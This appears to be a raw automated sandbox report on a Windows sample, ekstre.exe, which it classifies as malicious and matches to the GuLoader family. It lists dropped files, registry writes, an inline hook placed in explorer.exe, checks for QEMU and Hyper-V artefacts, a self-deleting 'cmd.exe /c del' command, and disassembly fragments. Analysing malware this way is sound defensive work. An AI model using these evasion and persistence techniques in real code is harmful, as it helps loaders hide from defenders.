Static PE information: No import functions for PE file found

Source: ekstre.exe, 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs ekstre.exe
Source: ekstre.exe, 00000000.00000002.1225423801.0000000002B81000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameapisetstubj% vs ekstre.exe
Source: ekstre.exe	Binary or memory string: OriginalFilename vs ekstre.exe
Source: ekstre.exe, 00000002.00000002.1368334017.0000000006954000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCONTROL.EXEj% vs ekstre.exe
Source: ekstre.exe, 00000002.00000003.1164868614.0000000036905000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs ekstre.exe
Source: ekstre.exe, 00000002.00000003.1169907253.0000000036ABF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs ekstre.exe
Source: ekstre.exe, 00000002.00000002.1255832338.00000000000DC000.00000040.10000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameCONTROL.EXEj% vs ekstre.exe

Source: C:\Users\user\Desktop\ekstre.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ekstre.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Section loaded: edgegdi.dll	Jump to behavior

Source: ekstre.exe	Virustotal: Detection: 42%
Source: ekstre.exe	ReversingLabs: Detection: 32%

Source: C:\Users\user\Desktop\ekstre.exe

File read: C:\Users\user\Desktop\ekstre.exe

Jump to behavior

Source: ekstre.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\ekstre.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\ekstre.exe C:\Users\user\Desktop\ekstre.exe
Source: C:\Users\user\Desktop\ekstre.exe	Process created: C:\Users\user\Desktop\ekstre.exe C:\Users\user\Desktop\ekstre.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
Source: C:\Windows\SysWOW64\control.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\ekstre.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ekstre.exe	Process created: C:\Users\user\Desktop\ekstre.exe C:\Users\user\Desktop\ekstre.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\ekstre.exe"	Jump to behavior

Source: C:\Users\user\Desktop\ekstre.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\ekstre.exe

0_2_00403640

Source: C:\Users\user\Desktop\ekstre.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Fonts

Jump to behavior

Source: C:\Users\user\Desktop\ekstre.exe

File created: C:\Users\user\AppData\Local\Temp\nsg7404.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@8/15@25/14

Source: C:\Users\user\Desktop\ekstre.exe

Code function: 0_2_004021AA LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,

0_2_004021AA

Source: C:\Users\user\Desktop\ekstre.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\ekstre.exe

Code function: 0_2_00404AB5 GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,LdrInitializeThunk,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_00404AB5

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9960:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9960:304:WilStaging_02

Source: ekstre.exe

String found in binary or memory: The device has succeeded a query-stop and its resource requirements have changed.

Source: C:\Users\user\Desktop\ekstre.exe

File written: C:\Users\user\AppData\Roaming\DORME.ini

Jump to behavior

Source: C:\Users\user\Desktop\ekstre.exe

Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Portgrave\Cybersex\forlistes\Protrudes

Jump to behavior

Source: ekstre.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: mshtml.pdb source: ekstre.exe, 00000002.00000001.1058237415.0000000000649000.00000008.00000001.01000000.00000007.sdmp
Source:	Binary string: api-ms-win-core-console-l1-2-0.pdb source: ekstre.exe, 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmp, ekstre.exe, 00000000.00000002.1225423801.0000000002B81000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: control.pdb source: ekstre.exe, 00000002.00000002.1368334017.0000000006954000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: control.exe
Source:	Binary string: control.pdbUGP source: ekstre.exe, 00000002.00000002.1368334017.0000000006954000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mshtml.pdbUGP source: ekstre.exe, 00000002.00000001.1058237415.0000000000649000.00000008.00000001.01000000.00000007.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: 00000000.00000002.1228563483.00000000081F9000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1227114587.0000000003769000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ekstre.exe PID: 1600, type: MEMORYSTR

Source: C:\Users\user\Desktop\ekstre.exe	Code function: 0_2_05901BF9 push FFFFFF80h; ret	0_2_05901C2B
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 0_2_0590550B push edi; iretd	0_2_05905538
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 0_2_0590669D push eax; iretd	0_2_059066A4
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 0_2_05902AB2 push esi; retf	0_2_05902ABB
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 0_2_059048A2 pushfd ; ret	0_2_059048A8
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 0_2_05900EA8 push ecx; retf	0_2_05900EA9
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 0_2_059066C1 push 00000002h; ret	0_2_059066C3
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 0_2_059044EE push 00000011h; iretd	0_2_059044F1
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 2_2_0166550B push edi; iretd	2_2_01665538
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 2_2_01661BF9 push FFFFFF80h; ret	2_2_01661C2B
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 2_2_016644EE push 00000011h; iretd	2_2_016644F1
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 2_2_016666C1 push 00000002h; ret	2_2_016666C3
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 2_2_016648A2 pushfd ; ret	2_2_016648A8
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 2_2_01660EA8 push ecx; retf	2_2_01660EA9
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 2_2_01662AB2 push esi; retf	2_2_01662ABB
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 2_2_0166669D push eax; iretd	2_2_016666A4
Source: C:\Windows\explorer.exe	Code function: 3_2_0A7D8B1E push esp; retn 0000h	3_2_0A7D8B1F
Source: C:\Windows\explorer.exe	Code function: 3_2_0A7D8B02 push esp; retn 0000h	3_2_0A7D8B03
Source: C:\Windows\explorer.exe	Code function: 3_2_0A7D89B5 push esp; retn 0000h	3_2_0A7D8AE7
Source: C:\Windows\explorer.exe	Code function: 3_2_121BAB1E push esp; retn 0000h	3_2_121BAB1F
Source: C:\Windows\explorer.exe	Code function: 3_2_121BAB02 push esp; retn 0000h	3_2_121BAB03
Source: C:\Windows\explorer.exe	Code function: 3_2_121BA9B5 push esp; retn 0000h	3_2_121BAAE7
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CB08CD push ecx; mov dword ptr [esp], ecx	4_2_04CB08D6
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_02B266C1 push es; retf	4_2_02B266EB
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_02B2E64C pushfd ; ret	4_2_02B2E650
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_02B2D4A5 push eax; ret	4_2_02B2D4F8
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_02B2D4F2 push eax; ret	4_2_02B2D4F8
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_02B2D4FB push eax; ret	4_2_02B2D562
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_02B2D55C push eax; ret	4_2_02B2D562
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_02B19B98 push 00000039h; ret	4_2_02B19BA0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_02B2DEBB push 1205285Dh; ret	4_2_02B2DEC2

Source: C:\Users\user\Desktop\ekstre.exe

Code function: 0_2_6DDD2351 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_6DDD2351

Source: api-ms-win-core-console-l1-2-0.dll.0.dr

Static PE information: 0xF772E6CE [Fri Jul 22 19:09:02 2101 UTC]

Source: C:\Users\user\Desktop\ekstre.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Primnesses\Sofabordets\Adreamed\Afhndelses\sukkerrters\api-ms-win-core-console-l1-2-0.dll			Jump to dropped file
Source: C:\Users\user\Desktop\ekstre.exe	File created: C:\Users\user\AppData\Local\Temp\nsc76F4.tmp\System.dll			Jump to dropped file

Source: C:\Users\user\Desktop\ekstre.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Primnesses\Sofabordets\Adreamed\Afhndelses\sukkerrters\Apache License 2.0.txt

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x83 0x3E 0xEE

Source: C:\Users\user\Desktop\ekstre.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ekstre.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ekstre.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ekstre.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ekstre.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ekstre.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect Any.run

Source: C:\Users\user\Desktop\ekstre.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\ekstre.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\user\Desktop\ekstre.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\ekstre.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Source: C:\Windows\explorer.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

graph_3-13915

Source: C:\Windows\explorer.exe TID: 6356	Thread sleep time: -52000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe TID: 5184	Thread sleep count: 128 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe TID: 5184	Thread sleep time: -256000s >= -30000s	Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\control.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\control.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\ekstre.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Primnesses\Sofabordets\Adreamed\Afhndelses\sukkerrters\api-ms-win-core-console-l1-2-0.dll

Jump to dropped file

Source: C:\Windows\SysWOW64\control.exe

Code function: 4_2_04D2CE40 rdtsc

4_2_04D2CE40

Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 865			Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 876			Jump to behavior

Source: C:\Windows\SysWOW64\control.exe

API coverage: 2.0 %

Source: C:\Windows\SysWOW64\control.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\ekstre.exe	Code function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,	0_2_00405D74
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 0_2_0040699E FindFirstFileW,FindClose,	0_2_0040699E
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 0_2_0040290B FindFirstFileW,	0_2_0040290B

Source: C:\Users\user\Desktop\ekstre.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\ekstre.exe	API call chain: ExitProcess graph end node			graph_0-4743
Source: C:\Users\user\Desktop\ekstre.exe	API call chain: ExitProcess graph end node			graph_0-4523

Source: ekstre.exe, 00000000.00000002.1334678642.000000000A939000.00000004.00000800.00020000.00000000.sdmp, ekstre.exe, 00000002.00000002.1369587695.0000000008309000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: ekstre.exe, 00000000.00000002.1334678642.000000000A939000.00000004.00000800.00020000.00000000.sdmp, ekstre.exe, 00000002.00000002.1369587695.0000000008309000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: ekstre.exe, 00000002.00000002.1369587695.0000000008309000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicshutdown
Source: ekstre.exe, 00000000.00000002.1334678642.000000000A939000.00000004.00000800.00020000.00000000.sdmp, ekstre.exe, 00000002.00000002.1369587695.0000000008309000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: ekstre.exe, 00000000.00000002.1334678642.000000000A939000.00000004.00000800.00020000.00000000.sdmp, ekstre.exe, 00000002.00000002.1369587695.0000000008309000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: ekstre.exe, 00000000.00000002.1334678642.000000000A939000.00000004.00000800.00020000.00000000.sdmp, ekstre.exe, 00000002.00000002.1369587695.0000000008309000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: ekstre.exe, 00000002.00000002.1369587695.0000000008309000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicvss
Source: ekstre.exe, 00000002.00000002.1368334017.0000000006925000.00000004.00000020.00020000.00000000.sdmp, ekstre.exe, 00000002.00000003.1167675585.0000000006925000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: ekstre.exe, 00000000.00000002.1334678642.000000000A939000.00000004.00000800.00020000.00000000.sdmp, ekstre.exe, 00000002.00000002.1369587695.0000000008309000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: ekstre.exe, 00000000.00000002.1334678642.000000000A939000.00000004.00000800.00020000.00000000.sdmp, ekstre.exe, 00000002.00000002.1369587695.0000000008309000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: ekstre.exe, 00000000.00000002.1334678642.000000000A939000.00000004.00000800.00020000.00000000.sdmp, ekstre.exe, 00000002.00000002.1369587695.0000000008309000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: ekstre.exe, 00000002.00000002.1369587695.0000000008309000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicheartbeat

Source: C:\Users\user\Desktop\ekstre.exe

0_2_6DDD2351

Source: C:\Windows\SysWOW64\control.exe

Code function: 4_2_04D2CE40 rdtsc

4_2_04D2CE40

Source: C:\Users\user\Desktop\ekstre.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CD44D1 mov eax, dword ptr fs:[00000030h]	4_2_04CD44D1
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CD44D1 mov eax, dword ptr fs:[00000030h]	4_2_04CD44D1
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CEE4EF mov eax, dword ptr fs:[00000030h]	4_2_04CEE4EF
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CEE4EF mov eax, dword ptr fs:[00000030h]	4_2_04CEE4EF
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D3E4F2 mov eax, dword ptr fs:[00000030h]	4_2_04D3E4F2
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D3E4F2 mov eax, dword ptr fs:[00000030h]	4_2_04D3E4F2
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CB64F0 mov eax, dword ptr fs:[00000030h]	4_2_04CB64F0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CEA4F0 mov eax, dword ptr fs:[00000030h]	4_2_04CEA4F0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CEA4F0 mov eax, dword ptr fs:[00000030h]	4_2_04CEA4F0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D3C490 mov eax, dword ptr fs:[00000030h]	4_2_04D3C490
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CE648A mov eax, dword ptr fs:[00000030h]	4_2_04CE648A
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CE648A mov eax, dword ptr fs:[00000030h]	4_2_04CE648A
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CE648A mov eax, dword ptr fs:[00000030h]	4_2_04CE648A
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CB0485 mov ecx, dword ptr fs:[00000030h]	4_2_04CB0485
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CE44A8 mov eax, dword ptr fs:[00000030h]	4_2_04CE44A8
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CB24A2 mov eax, dword ptr fs:[00000030h]	4_2_04CB24A2
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CB24A2 mov ecx, dword ptr fs:[00000030h]	4_2_04CB24A2
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D484BB mov eax, dword ptr fs:[00000030h]	4_2_04D484BB
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CEE4BC mov eax, dword ptr fs:[00000030h]	4_2_04CEE4BC
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC0445 mov eax, dword ptr fs:[00000030h]	4_2_04CC0445
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC0445 mov eax, dword ptr fs:[00000030h]	4_2_04CC0445
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC0445 mov eax, dword ptr fs:[00000030h]	4_2_04CC0445
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC0445 mov eax, dword ptr fs:[00000030h]	4_2_04CC0445
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC0445 mov eax, dword ptr fs:[00000030h]	4_2_04CC0445
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC0445 mov eax, dword ptr fs:[00000030h]	4_2_04CC0445
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D30443 mov eax, dword ptr fs:[00000030h]	4_2_04D30443
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CDE45E mov eax, dword ptr fs:[00000030h]	4_2_04CDE45E
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CDE45E mov eax, dword ptr fs:[00000030h]	4_2_04CDE45E
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CDE45E mov eax, dword ptr fs:[00000030h]	4_2_04CDE45E
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CDE45E mov eax, dword ptr fs:[00000030h]	4_2_04CDE45E
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CDE45E mov eax, dword ptr fs:[00000030h]	4_2_04CDE45E
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D3E461 mov eax, dword ptr fs:[00000030h]	4_2_04D3E461
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D7A464 mov eax, dword ptr fs:[00000030h]	4_2_04D7A464
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CB8470 mov eax, dword ptr fs:[00000030h]	4_2_04CB8470
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CB8470 mov eax, dword ptr fs:[00000030h]	4_2_04CB8470
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CA640D mov eax, dword ptr fs:[00000030h]	4_2_04CA640D
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D46400 mov eax, dword ptr fs:[00000030h]	4_2_04D46400
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D46400 mov eax, dword ptr fs:[00000030h]	4_2_04D46400
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CEC5C6 mov eax, dword ptr fs:[00000030h]	4_2_04CEC5C6
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D305C6 mov eax, dword ptr fs:[00000030h]	4_2_04D305C6
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CE65D0 mov eax, dword ptr fs:[00000030h]	4_2_04CE65D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CEA5E7 mov ebx, dword ptr fs:[00000030h]	4_2_04CEA5E7
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CEA5E7 mov eax, dword ptr fs:[00000030h]	4_2_04CEA5E7
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D3C5FC mov eax, dword ptr fs:[00000030h]	4_2_04D3C5FC
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D3C592 mov eax, dword ptr fs:[00000030h]	4_2_04D3C592
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CEA580 mov eax, dword ptr fs:[00000030h]	4_2_04CEA580
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CEA580 mov eax, dword ptr fs:[00000030h]	4_2_04CEA580
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D2E588 mov eax, dword ptr fs:[00000030h]	4_2_04D2E588
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D2E588 mov eax, dword ptr fs:[00000030h]	4_2_04D2E588
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CE2594 mov eax, dword ptr fs:[00000030h]	4_2_04CE2594
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D385AA mov eax, dword ptr fs:[00000030h]	4_2_04D385AA
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CB45B0 mov eax, dword ptr fs:[00000030h]	4_2_04CB45B0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CB45B0 mov eax, dword ptr fs:[00000030h]	4_2_04CB45B0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D46550 mov eax, dword ptr fs:[00000030h]	4_2_04D46550
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D7A553 mov eax, dword ptr fs:[00000030h]	4_2_04D7A553
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CB254C mov eax, dword ptr fs:[00000030h]	4_2_04CB254C
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CCE547 mov eax, dword ptr fs:[00000030h]	4_2_04CCE547
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CE6540 mov eax, dword ptr fs:[00000030h]	4_2_04CE6540
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CE8540 mov eax, dword ptr fs:[00000030h]	4_2_04CE8540
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CCC560 mov eax, dword ptr fs:[00000030h]	4_2_04CCC560
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CEC50D mov eax, dword ptr fs:[00000030h]	4_2_04CEC50D
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CEC50D mov eax, dword ptr fs:[00000030h]	4_2_04CEC50D
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CDE507 mov eax, dword ptr fs:[00000030h]	4_2_04CDE507
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CDE507 mov eax, dword ptr fs:[00000030h]	4_2_04CDE507
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CDE507 mov eax, dword ptr fs:[00000030h]	4_2_04CDE507
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CDE507 mov eax, dword ptr fs:[00000030h]	4_2_04CDE507
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CDE507 mov eax, dword ptr fs:[00000030h]	4_2_04CDE507
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CDE507 mov eax, dword ptr fs:[00000030h]	4_2_04CDE507
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CDE507 mov eax, dword ptr fs:[00000030h]	4_2_04CDE507
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CDE507 mov eax, dword ptr fs:[00000030h]	4_2_04CDE507
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CB2500 mov eax, dword ptr fs:[00000030h]	4_2_04CB2500
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D3C51D mov eax, dword ptr fs:[00000030h]	4_2_04D3C51D
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC252B mov eax, dword ptr fs:[00000030h]	4_2_04CC252B
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC252B mov eax, dword ptr fs:[00000030h]	4_2_04CC252B
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC252B mov eax, dword ptr fs:[00000030h]	4_2_04CC252B
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC252B mov eax, dword ptr fs:[00000030h]	4_2_04CC252B
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC252B mov eax, dword ptr fs:[00000030h]	4_2_04CC252B
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC252B mov eax, dword ptr fs:[00000030h]	4_2_04CC252B
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CC252B mov eax, dword ptr fs:[00000030h]	4_2_04CC252B
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CF2539 mov eax, dword ptr fs:[00000030h]	4_2_04CF2539
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D466D0 mov eax, dword ptr fs:[00000030h]	4_2_04D466D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D466D0 mov eax, dword ptr fs:[00000030h]	4_2_04D466D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CB06CF mov eax, dword ptr fs:[00000030h]	4_2_04CB06CF
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D7A6C0 mov eax, dword ptr fs:[00000030h]	4_2_04D7A6C0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D586C2 mov eax, dword ptr fs:[00000030h]	4_2_04D586C2
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D2C6F2 mov eax, dword ptr fs:[00000030h]	4_2_04D2C6F2
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04D2C6F2 mov eax, dword ptr fs:[00000030h]	4_2_04D2C6F2
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CBC6E0 mov eax, dword ptr fs:[00000030h]	4_2_04CBC6E0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CD66E0 mov eax, dword ptr fs:[00000030h]	4_2_04CD66E0
Source: C:\Windows\SysWOW64\control.exe	Code function: 4_2_04CD66E0 mov eax, dword ptr fs:[00000030h]	4_2_04CD66E0
